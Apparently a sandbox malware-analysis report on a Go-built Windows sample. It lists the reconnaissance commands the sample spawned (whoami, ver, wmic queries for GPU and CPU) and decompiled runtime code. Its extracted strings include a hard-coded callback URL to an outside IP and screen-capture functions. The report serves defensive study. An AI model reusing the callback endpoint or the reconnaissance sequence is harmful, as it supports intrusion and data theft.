Imagebase:0x7ff6746d0000
File size:521728 bytes
MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:13
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C ver
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:13
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:14
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic path win32_VideoController get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:14
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:14
Start date:14/01/2022
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff6746d0000
File size:521728 bytes
MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:31
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C whoami
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:31
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C whoami
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:31
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:31
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:32
Start date:14/01/2022
Path:C:\Windows\System32\whoami.exe
Wow64 process (32bit):false
Commandline:whoami
Imagebase:0x7ff7aa4f0000
File size:70144 bytes
MD5 hash:AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:32
Start date:14/01/2022
Path:C:\Windows\System32\whoami.exe
Wow64 process (32bit):false
Commandline:whoami
Imagebase:0x7ff7aa4f0000
File size:70144 bytes
MD5 hash:AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:33
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C whoami
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:33
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C whoami
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:33
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:33
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:33
Start date:14/01/2022
Path:C:\Windows\System32\whoami.exe
Wow64 process (32bit):false
Commandline:whoami
Imagebase:0x7ff7aa4f0000
File size:70144 bytes
MD5 hash:AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:33
Start date:14/01/2022
Path:C:\Windows\System32\whoami.exe
Wow64 process (32bit):false
Commandline:whoami
Imagebase:0x7ff7aa4f0000
File size:70144 bytes
MD5 hash:AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:34
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic cpu get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:34
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic cpu get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:34
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:35
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

Disassembly

Code Analysis

Reset < >

    Executed Functions

    Non-executed Functions

    C-Code - Quality: 60%
    			E00431270(void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, void* __rdi, long long __rbp, void* __r9) {
    				char _v8;
    				char _v32;
    				intOrPtr _v48;
    				char _v56;
    				long long _v64;
    				long long _v72;
    				long long _v80;
    				char _v88;
    				long long _v104;
    				long long _v128;
    				long long _v136;
    				long long _v144;
    				long long _v152;
    				void* _t42;
    				void* _t60;
    				void* _t61;
    				void* _t62;
    				void* _t63;
    				void* _t64;
    				long long _t78;
    				intOrPtr _t82;
    				long long _t88;
    				long long _t89;
    				long long _t94;
    				long long* _t95;
    				void* _t100;
    				long long* _t101;
    				void* _t103;
    
    				L0:
    				while(1) {
    					L0:
    					_t103 = __r9;
    					_t98 = __rbp;
    					_t64 = __esp;
    					_t63 = __esi;
    					_t62 = __edi;
    					_t61 = __edx;
    					_t60 = __ecx;
    					if( &_v32 <=  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x10))) {
    						goto L7;
    					}
    					L1:
    					_t101 = _t100 - 0xa0;
    					_v8 = __rbp;
    					_t98 =  &_v8;
    					_v88 = 0;
    					 *_t101 =  *0x8960f0;
    					_v152 = 0xffffffff;
    					_v144 = 0xfffffffe;
    					_v136 = 0xffffffff;
    					_v128 =  &_v88;
    					asm("xorps xmm0, xmm0");
    					asm("movups [esp+0x28], xmm0");
    					_v104 = 2;
    					E00431980( &_v8);
    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x30)) + 0x278)) = _v88;
    					asm("xorps xmm0, xmm0");
    					asm("movups [esp+0x68], xmm0");
    					asm("movups [esp+0x78], xmm0");
    					asm("movups [esp+0x88], xmm0");
    					 *_t101 =  *0x896040;
    					_v152 =  &_v56;
    					_t78 =  &_v56;
    					_v144 = _t78;
    					_v136 = 0x30;
    					_t42 = E00431780( &_v8);
    					if(_v128 == 0) {
    						L6:
    						E004601C0();
    						_v72 = _t78;
    						L00433D40( *_t101, _t98);
    						 *_t101 =  &M006F3C3B;
    						_v152 = 0x24;
    						L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103);
    						 *_t101 = _v72;
    						E004343F0(_t60, _t62, _t63, _t64, _t98, _t103);
    						L00433DD0(L00433FD0(_t60, _t61, _t62, _t63, _t64, _t98, _t103), _t98);
    						 *_t101 = "VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusforEachP: sched.safePointWait != 0http2: aborting request body writehttp: connection has been hijackedhttp: persistConn.readLoop exitinghttp: read on closed response bodyinvalid padding bits in BIT STRINGmspan.ensureSwept: m is not lockedout of memory allocating allArenasreflect.FuncOf: too many argumentsreflect: Field index out of boundsreflect: Method index out of rangereflect: string index out of rangeruntime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workstream error: stream ID %d; %v; %vtimeout waiting for client prefacetls: invalid certificate signaturetls: malformed key_share extensiontoo many references: cannot spliceunexpected runtime.netpoll error: unsupported authentication method x509: Ed25519 verification failurex509: unhandled critical extension%d response missing Location header\'_\' must separate successive digits1776356839400250464677810668945312588817841970012523233890533447265625CONTINUATION frame with stream ID 0SubscribeServiceChangeNotificationschacha20: output smaller than inputcrypto/md5: invalid hash state sizedynamic table size update too largeed25519: cannot sign hashed messageencoding/hex: odd length hex stringexecutable file not found in %PATH%file type does not support deadlinefindfunc: bad findfunctab entry idxfindrunnable: netpoll with spinningflate: corrupt input before offset greyobject: obj not pointer-alignedhash/crc32: invalid hash state sizehpack: invalid Huffman-encoded datahttp: server closed idle connectionhttp://185.112.83.96:20000/callbackmheap.freeSpanLocked - invalid freemime: bogus characters after %%: %qmime: invalid RFC 2047 encoded-wordnetwork dropped connection on resetno such multicast network interfacepersistentalloc: align is too largepidleput: P has non-empty run queuereflect.MakeSlice of non-slice typeruntime: close polldesc w/o unblockruntime: createevent failed; errno=runtime: inconsistent read deadlinesuperfluous leading zeros in lengthtls: invalid or missing PSK binderstls: server selected an invalid PSKtls: too many non-advancing recordstoo many Questions to pack (>65535)traceback did not unwind completelytransform: short destination buffertransport endpoint is not connectedx509: decryption password incorrectx509: wrong Ed25519 public key sizezlib: invalid compression level: %d LastStreamID=%v ErrCode=%v Debug=%q0123456789abcdefghijklmnopqrstuvwxyz44408920985006261616945266723632812586b4f9e6-366b-47b0-ab4e-15c6cd2f7074Go pointer stored into non-Go memoryIA5String contains invalid characterMStats vs MemStatsType size mismatchTime.UnmarshalBinary: invalid lengthUnable to determine system directoryaccessing a corrupted shared librarycompressed name in SRV resource datacrypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0crypto/sha1: invalid hash state sizecrypto/sha512: invalid hash functionhttp: no Location header in responsehttp: unexpected EOF reading trailermalformed MIME header initial line: no acceptable authentication methodsreflect: IsVariadic of non-func typereflect: NumField of non-struct typereflect: funcLayout of non-func typeruntime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackstrings.Builder.Grow: negative countsyntax error scanning complex numbertls: server did not send a key shareuncaching span but s.allocCount == 0unsupported SSLv2 handshake receivedx509: zero or negative DSA parameter) is smaller than minimum page size (2220446049250313080847263336181640625Could not Create DIB Section err:%d.\nCould not Get primary display err:%d\nUnsubscribeServiceChangeNotifications_cgo_notify_runtime_init_done missingall goroutines are asleep - deadlock!bytes.Buffer: truncation out of rangecannot exec a shared library directlychacha20poly1305: plaintext too largecipher: message authentication failedcrypto/cipher: incorrect GCM tag sizecrypto/cipher: invalid buffer overlapcrypto/rsa: public exponent too largecrypto/rsa: public exponent too smallcrypto/rsa: unsupported hash functioncrypto: Size of unknown hash functionexplicitly tagged member didn\'t matchhash/adler32: invalid hash state sizeinternal error: unknown network type reflect.Value.Bytes of non-byte slicereflect.Value.Bytes of non-rune slicereflect: Bits of non-arithmetic Type runtime: allocation size out of rangeruntime: failed mSpanList.insertBack setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpsubtle: slices have different lengthstls: unsupported certificate key (%T)too many Additionals to pack (>65535)too many Authorities to pack (>65535)unexpected CONTINUATION for stream %dvalue too large for defined data typex509: RSA key missing NULL parameters1110223024625156540423631668090820312555511151231257827021181583404541015625Could not Get primary display err:%d.\nUnable to determine system directory: arg size to reflect.call more than 1GBcan not access a needed shared librarychacha20poly1305: ciphertext too largeconcurrent map iteration and map writecrypto/sha256: invalid hash state sizecrypto/sha512: invalid hash state sizeencoding alphabet is not 64-bytes longfailed to parse Location header %q: %vgcBgMarkWorker: blackening not enabledinsufficient data for base length typeinternal error: unknown string type %dmakechan: invalid channel element typemime: expected slash after first tokennet/http: invalid header field name %qruntime: blocked read on free polldescruntime: sudog with non-false isSelecttime: missing Location in call to Datetls: client sent unexpected early datatls: failed to sign ECDHE parameters: tls: internal error: unsupported curvetls: invalid ClientKeyExchange messagetls: invalid ServerKeyExchange messagetls: missing ServerKeyExchange messagetls: server selected unsupported curvetls: server selected unsupported grouptls: unsupported signing key type (%T)x509: cannot validate certificate for x509: empty name constraints extensionx509: trailing data after X.509 key-id because it doesn\'t contain any IP SANs2006-01-02 15:04:05.999999999 -0700 MST277555756156289135105907917022705078125Could not Create Compatible DC err:%d.\nPowerRegisterSuspendResumeNotification";
    						_v152 = 0x22;
    						L00433220(_t98);
    						goto L7;
    					}
    					L2:
    					_t82 = _v48;
    					_t94 = _t82 + 0x4000;
    					_v80 = _t94;
    					_t95 =  *((intOrPtr*)( *[gs:0x28]));
    					_t89 =  *((intOrPtr*)(_t95 + 8));
    					_v64 = _t89;
    					if(_t94 > _t89 || _t89 > 0x4000000) {
    						L5:
    						L00433D40(_t42, _t98);
    						 *_t101 =  &M006EBF74;
    						_v152 = 0x13;
    						L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103);
    						 *_t101 = _v80;
    						L00434560(_t61, _t62, _t63, _t64, _t98, _t103);
    						 *_t101 =  &M006E6129;
    						_v152 = 1;
    						L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103);
    						 *_t101 = _v64;
    						L00434560(_t61, _t62, _t63, _t64, _t98, _t103);
    						 *_t101 = 0x6e6161;
    						_v152 = 2;
    						L00433DD0(L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103), _t98);
    						_t78 =  &M006E88B1;
    						 *_t101 = _t78;
    						_v152 = 0xc;
    						L00433220(_t98);
    						goto L6;
    					}
    					L4:
    					 *_t95 = _t94;
    					_t88 = _t82 + 0x5370;
    					 *((long long*)(_t95 + 0x10)) = _t88;
    					 *((long long*)(_t95 + 0x18)) = _t88;
    					return E0045E250(_t42);
    					L8:
    					L7:
    					E0045C900(_t95, _t98);
    				}
    			}































    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431289
    0x00000000
    0x00000000
    0x0043128f
    0x0043128f
    0x00431296
    0x0043129e
    0x004312a6
    0x004312b6
    0x004312ba
    0x004312c3
    0x004312cc
    0x004312da
    0x004312df
    0x004312e2
    0x004312e7
    0x004312f0
    0x0043130e
    0x00431315
    0x00431318
    0x0043131d
    0x00431322
    0x00431331
    0x0043133a
    0x0043133f
    0x00431344
    0x00431349
    0x00431352
    0x0043135d
    0x0043144e
    0x0043144e
    0x00431456
    0x0043145b
    0x00431467
    0x0043146b
    0x00431474
    0x0043147e
    0x00431482
    0x0043148c
    0x00431498
    0x0043149c
    0x004314a5
    0x00000000
    0x004314a5
    0x00431363
    0x00431363
    0x00431368
    0x0043136f
    0x0043137d
    0x00431384
    0x00431388
    0x00431390
    0x004313c4
    0x004313c4
    0x004313d0
    0x004313d4
    0x004313dd
    0x004313e7
    0x004313eb
    0x004313f7
    0x004313fb
    0x00431404
    0x0043140e
    0x00431412
    0x0043141e
    0x00431422
    0x00431430
    0x00431435
    0x0043143c
    0x00431440
    0x00431449
    0x00000000
    0x00431449
    0x0043139e
    0x0043139e
    0x004313a1
    0x004313a7
    0x004313ab
    0x004313c3
    0x00000000
    0x004314ab
    0x004314ab
    0x004314ab

    Strings
    • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 004313F0
    • ", xrefs: 0043149C
    • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filestoo much pixel dataunknown Go type: %vunknown certificateunknown cipher typeunknown statu, xrefs: 004313C9
    • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycomctl32.dllcomdlg32.dllcontent-typecontext.TODOdebugCall128dumping heapend tracegcentersyscallexit status gcpacertracegetaddrinfowhost is downhttp2deb, xrefs: 00431435
    • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00431460
    • VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusforEachP: sched.safePointWait != 0http2: aborting reques, xrefs: 00431491
    • 0, xrefs: 00431349
    Memory Dump Source
    • Source File: 00000000.00000002.561154146.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.561141957.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.563111718.00000000008DC000.00000040.00020000.sdmp Download File
    • Associated: 00000000.00000002.563154244.00000000008F7000.00000040.00020000.sdmp Download File
    • Associated: 00000000.00000002.563206160.00000000008FA000.00000040.00020000.sdmp Download File
    • Associated: 00000000.00000002.563247920.00000000008FD000.00000040.00020000.sdmp Download File
    • Associated: 00000000.00000002.563301155.00000000008FE000.00000080.00020000.sdmp Download File
    • Associated: 00000000.00000002.563362983.00000000008FF000.00000004.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.jbxd
    Similarity
    • API ID:
    • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$0$VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusforEachP: sched.safePointWait != 0http2: aborting reques$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycomctl32.dllcomdlg32.dllcontent-typecontext.TODOdebugCall128dumping heapend tracegcentersyscallexit status gcpacertracegetaddrinfowhost is downhttp2deb$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filestoo much pixel dataunknown Go type: %vunknown certificateunknown cipher typeunknown statu
    • API String ID: 0-735344959
    • Opcode ID: 9fff890d98466b29b5cc5f42db71fad23afb86daac7df5ea3f2d2c96fe400bb3
    • Instruction ID: 406224d717a5126b36259e59a2dfcca9e8291f132d8d349d47811cb3184dca4b
    • Opcode Fuzzy Hash: 9fff890d98466b29b5cc5f42db71fad23afb86daac7df5ea3f2d2c96fe400bb3
    • Instruction Fuzzy Hash: C7513836508F8185DB10DF55F48539AB3A4F7897A4F50922AEADC03BA9EF7CC1A4CB04
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0043D8E0(long long __rbp, long long _a8) {
    				char _v8;
    				long long _v16;
    				long long _v24;
    				long long _v32;
    				long long _v40;
    				long long _v48;
    				long long _v56;
    				long long _v64;
    				long long _v72;
    				long long _v80;
    				void* _t59;
    				void* _t62;
    				void* _t63;
    				void* _t64;
    				void* _t82;
    				void* _t83;
    				void* _t85;
    				void* _t86;
    				void* _t87;
    				long long _t96;
    				long long _t98;
    				intOrPtr _t99;
    				long long _t102;
    				long long _t120;
    				intOrPtr _t123;
    				intOrPtr _t125;
    				long long _t128;
    				void* _t134;
    				long long* _t135;
    				void* _t137;
    				void* _t138;
    				void* _t139;
    				void* _t140;
    				void* _t141;
    				void* _t142;
    				void* _t143;
    				void* _t144;
    
    				L0:
    				while(1) {
    					L0:
    					_t132 = __rbp;
    					if(_t134 <=  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x10))) {
    						goto L11;
    					}
    					L1:
    					_t135 = _t134 - 0x58;
    					_v8 = __rbp;
    					_t132 =  &_v8;
    					_t96 =  *((intOrPtr*)( *[gs:0x28]));
    					_t123 =  *((intOrPtr*)(_t96 + 0x30));
    					_t128 =  *((intOrPtr*)(_t123 + 0xa0));
    					if(_t128 == 0 ||  *((long long*)(_t123 + 0x130)) == 0) {
    						L10:
    						 *_t135 =  &M006ECFA3;
    						_v80 = 0x15;
    						L00433220(_t132);
    						goto L11;
    					}
    					L3:
    					_v48 = _t96;
    					 *_t135 = _t128;
    					_t62 = E00441E60(_t59);
    					_t98 = _v80;
    					_v56 = _t98;
    					 *_t135 =  *((intOrPtr*)(_t98 + 0x38));
    					_t63 = E00441E80(_t62);
    					_t99 = _v48;
    					_t125 =  *((intOrPtr*)(_t99 + 0x30));
    					if(_v80 != _t125) {
    						L9:
    						 *_t135 =  *((intOrPtr*)(_t125 + 0xa0));
    						_t64 = E00441E60(_t63);
    						_t102 =  *((intOrPtr*)(_v48 + 0x30));
    						_v16 = _t102;
    						_v24 = _v80;
    						_t128 = _v56;
    						_t119 =  *((intOrPtr*)(_t128 + 0x38));
    						_v64 =  *((intOrPtr*)(_t128 + 0x38));
    						_v32 =  *((intOrPtr*)(_t102 + 0x130));
    						_t130 =  *((intOrPtr*)(_t128 + 0x40));
    						_v40 =  *((intOrPtr*)(_t128 + 0x40));
    						_v72 = _t128;
    						L00433D40(_t64, _t132);
    						 *_t135 =  &M006E8A9D;
    						_v80 = 0xc;
    						L004346A0(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x38)), _t128, _t132, _t138);
    						 *_t135 = _v16;
    						L00434650(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x40)), _t132, _t138);
    						 *_t135 = 0x6e68dd;
    						_v80 = 6;
    						L004346A0(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x38)), _t128, _t132, _t138);
    						 *_t135 = _v24;
    						L00434650(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x40)), _t132, _t138);
    						 *_t135 = 0x6e68e9;
    						_v80 = 6;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v64;
    						L00434560( *((intOrPtr*)(_t128 + 4)), _t85, _t86, _t87, _t132, _t138);
    						 *_t135 =  &M006E7E63;
    						_v80 = 0xb;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v32;
    						L00434650(_t82, _t85, _t86, _t87, _t130, _t132, _t138);
    						 *_t135 =  &M006E7E8F;
    						_v80 = 0xb;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v40;
    						L00434650(_t82, _t85, _t86, _t87, _t130, _t132, _t138);
    						 *_t135 =  &M006E7E9A;
    						_v80 = 0xb;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v72;
    						E004343F0(_t82, _t85, _t86, _t87, _t132, _t138);
    						L00433DD0(L00433FD0(_t82,  *((intOrPtr*)(_t128 + 4)), _t85, _t86, _t87, _t132, _t138), _t132);
    						 *_t135 = 0x6ef0e1;
    						_v80 = 0x19;
    						L00433220(_t132);
    						goto L10;
    					}
    					L4:
    					_t120 = _v56;
    					if( *((intOrPtr*)(_t120 + 0x40)) !=  *((intOrPtr*)(_t125 + 0x130)) ||  *((intOrPtr*)(_t120 + 4)) != 1) {
    						goto L9;
    					}
    					L6:
    					if( *0x8e6e10 != 0) {
    						 *_t135 =  *((intOrPtr*)(_t125 + 0xa0));
    						E00441E60(_t63);
    						 *_t135 = _v80;
    						_t63 = E00450DD0(_t83, _t87,  &_v8, _t137, _t138, _t139, _t140, _t141, _t142, _t143, _t144);
    						_t99 = _v48;
    						_t120 = _v56;
    					}
    					 *((long long*)( *((intOrPtr*)(_t99 + 0x30)) + 0xa0)) = 0;
    					 *((long long*)( *((intOrPtr*)(_t99 + 0x30)) + 0x130)) = 0;
    					 *((long long*)(_t120 + 0x38)) = 0;
    					 *((intOrPtr*)(_t120 + 4)) = 0;
    					_a8 = _t120;
    					return _t63;
    					L12:
    					L11:
    					E0045C900(_t128, _t132);
    				}
    			}








































    0x0043d8e0
    0x0043d8e0
    0x0043d8e0
    0x0043d8e0
    0x0043d8f4
    0x00000000
    0x00000000
    0x0043d8fa
    0x0043d8fa
    0x0043d8fe
    0x0043d903
    0x0043d911
    0x0043d918
    0x0043d91c
    0x0043d926
    0x0043db5f
    0x0043db66
    0x0043db6a
    0x0043db73
    0x00000000
    0x0043db73
    0x0043d93a
    0x0043d93a
    0x0043d93f
    0x0043d943
    0x0043d948
    0x0043d94d
    0x0043d956
    0x0043d95a
    0x0043d95f
    0x0043d964
    0x0043d96d
    0x0043d9fa
    0x0043da01
    0x0043da05
    0x0043da0f
    0x0043da13
    0x0043da1d
    0x0043da22
    0x0043da27
    0x0043da2b
    0x0043da37
    0x0043da3c
    0x0043da40
    0x0043da48
    0x0043da4d
    0x0043da59
    0x0043da5d
    0x0043da66
    0x0043da70
    0x0043da74
    0x0043da80
    0x0043da84
    0x0043da8d
    0x0043da97
    0x0043da9b
    0x0043daa7
    0x0043daab
    0x0043dab4
    0x0043dabe
    0x0043dac2
    0x0043dace
    0x0043dad2
    0x0043dadb
    0x0043dae5
    0x0043dae9
    0x0043daf5
    0x0043daf9
    0x0043db02
    0x0043db0c
    0x0043db10
    0x0043db1c
    0x0043db20
    0x0043db29
    0x0043db33
    0x0043db37
    0x0043db41
    0x0043db4d
    0x0043db51
    0x0043db5a
    0x00000000
    0x0043db5a
    0x0043d973
    0x0043d97a
    0x0043d983
    0x00000000
    0x00000000
    0x0043d98b
    0x0043d992
    0x0043d9d7
    0x0043d9db
    0x0043d9e5
    0x0043d9e9
    0x0043d9ee
    0x0043d9f3
    0x0043d9f3
    0x0043d998
    0x0043d9a7
    0x0043d9b2
    0x0043d9ba
    0x0043d9c1
    0x0043d9cf
    0x00000000
    0x0043db79
    0x0043db79
    0x0043db79

    Strings
    • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0AppServicesBad GatewayBad Req, xrefs: 0043DAC7
    • m->p= next= p->m= prev= span= varp=%d.exe(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEEndDocExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLockedLy, xrefs: 0043DA79
    • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/breakpoint trapunknown , xrefs: 0043DB5F
